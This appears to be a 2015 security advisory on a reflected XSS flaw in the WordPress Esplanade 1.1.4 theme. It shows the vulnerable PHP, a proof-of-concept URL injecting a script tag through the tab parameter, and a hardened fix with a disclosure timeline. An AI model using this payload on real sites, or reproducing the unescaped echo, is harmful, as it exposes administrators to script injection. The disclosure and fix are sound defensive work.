26-05-2015 / Vulnerabilities

WordPress Esplanade 1.1.4 Theme Reflected XSS

The tab request parameter ($_GET['tab']) is read straight from the query string and echoed into the name attribute of two input elements without sanitization or escaping, giving a reflected cross-site scripting issue on the theme options page.

File: esplanade\includes\theme-options.php

function esplanade_theme_page() {
	// The options page is only reachable by users with the edit_theme_options capability.
	add_theme_page( __( 'Esplanade Theme Options', 'esplanade' ), __( 'Theme Options', 'esplanade' ), 'edit_theme_options', 'esplanade_options', 'esplanade_admin_options_page' );
}
add_action( 'admin_menu', 'esplanade_theme_page' );
function esplanade_admin_options_page() { ?>
	<div class="wrap">
		<?php esplanade_admin_options_page_tabs(); ?>
		<?php if ( isset( $_GET['settings-updated'] ) ) : ?>
			<div class='updated'><p><?php _e( 'Theme settings updated successfully.', 'esplanade' ); ?></p></div>
		<?php endif; ?>
		<form action="options.php" method="post">
			<?php settings_fields( 'esplanade_theme_options' ); ?>
			<?php do_settings_sections('esplanade_options'); ?>
			<p>&nbsp;</p>
			<?php // Taken as-is from the query string; no sanitization or allow-list. ?>
			<?php $tab = ( isset( $_GET['tab'] ) ? $_GET['tab'] : 'general' ); ?>
			<?php // Echoed unescaped inside a double-quoted attribute on the next two lines. ?>
			<input name="esplanade_theme_options[submit-<?php echo $tab; ?>]" type="submit" class="button-primary" value="<?php _e( 'Save Settings', 'esplanade' ); ?>" />
			<input name="esplanade_theme_options[reset-<?php echo $tab; ?>]" type="submit" class="button-secondary" value="<?php _e( 'Reset Defaults', 'esplanade' ); ?>" />
			<script> 
				jQuery(document).ready(function($) { 
					$('.wp-color-picker').wpColorPicker(); 
				}); 
			</script>
		</form>
	</div>
<?php }

Proof of Concept

The options page is registered with the edit_theme_options capability, so the payload only executes in the browser of a logged-in user who holds that capability (normally an administrator) and who opens the crafted link; as with any reflected XSS, the attacker has to get such a user to follow it. In the URL below the leading double quote terminates the name attribute, the "/>" closes the input element, and the script element that follows is rendered as live markup.

http://wordpress-url/wp-admin/themes.php?page=esplanade_options&tab="/><script>alert(String.fromCharCode(88,83,83));</script>
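The attribute construction above next to a hardened version, run against the advisory's payload. This is an added example, not code from the Esplanade theme, from the 1.1.5 fix, or from the original advisory. It assumes a hypothetical list of tab names ('general', 'layout', 'colors'); outside WordPress, esc_attr() and sanitize_key() do not exist, so minimal stand-ins with the same behaviour are defined here so the script runs from the command line.

```php
<?php
// Added example (not part of the Esplanade theme or the original advisory):
// the vulnerable attribute construction from theme-options.php beside a
// hardened version, exercised with the advisory's proof-of-concept payload.

// Stand-ins for WordPress escaping helpers so this runs outside WordPress.
// Assumption: inside WordPress the real esc_attr()/sanitize_key() are used.
if ( ! function_exists( 'esc_attr' ) ) {
	function esc_attr( $text ) {
		return htmlspecialchars( (string) $text, ENT_QUOTES, 'UTF-8' );
	}
}
if ( ! function_exists( 'sanitize_key' ) ) {
	function sanitize_key( $key ) {
		// WordPress sanitize_key() keeps only lowercase a-z, 0-9, '_' and '-'.
		return preg_replace( '/[^a-z0-9_\-]/', '', strtolower( (string) $key ) );
	}
}

// Hypothetical tab names; the theme's real ones come from
// esplanade_admin_options_page_tabs() and are not listed in the advisory.
$known_tabs = array( 'general', 'layout', 'colors' );

// Vulnerable: $_GET['tab'] is concatenated into the attribute as in 1.1.4.
function render_submit_vulnerable( array $get ) {
	$tab = isset( $get['tab'] ) ? $get['tab'] : 'general';
	return '<input name="esplanade_theme_options[submit-' . $tab . ']" type="submit" class="button-primary" />';
}

// Hardened: normalise the value to a slug, fall back to the default tab when
// it is not one of the known tabs, and still attribute-escape at output time
// (defence in depth: the escape protects even if the allow-list is bypassed).
function render_submit_hardened( array $get, array $known_tabs ) {
	$tab = isset( $get['tab'] ) ? sanitize_key( $get['tab'] ) : 'general';
	if ( ! in_array( $tab, $known_tabs, true ) ) {
		$tab = 'general';
	}
	return '<input name="esplanade_theme_options[submit-' . esc_attr( $tab ) . ']" type="submit" class="button-primary" />';
}

// Constructed request carrying the payload from the proof of concept.
$request = array( 'tab' => '"/><script>alert(String.fromCharCode(88,83,83));</script>' );

echo "vulnerable: ", render_submit_vulnerable( $request ), PHP_EOL;
// The quote ends the name attribute, "/>" closes the input, and the
// <script> element is emitted as real markup.

echo "hardened:   ", render_submit_hardened( $request, $known_tabs ), PHP_EOL;
// sanitize_key() strips the quotes and brackets, the remainder is not a
// known tab, so the button is rendered for "general".

// Escaping alone, without the allow-list, also keeps the value inside the
// attribute: quotes and angle brackets become entities.
echo "escaped:    <input name=\"esplanade_theme_options[submit-" . esc_attr( $request['tab'] ) . "]\" type=\"submit\" />", PHP_EOL;
```

Run with `php example.php`. The allow-list is the stronger fix here because the tab name is only ever used to pick which settings group the submit or reset button belongs to, so there is no legitimate reason for it to carry anything but a known slug; the esc_attr() call remains as the last line of defence at the point where the value meets HTML.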

Timeline

  • 16-01-2015: Discovered
  • 16-01-2015: Vendor notified
  • 17-01-2015: Version 1.1.5 released, issue resolved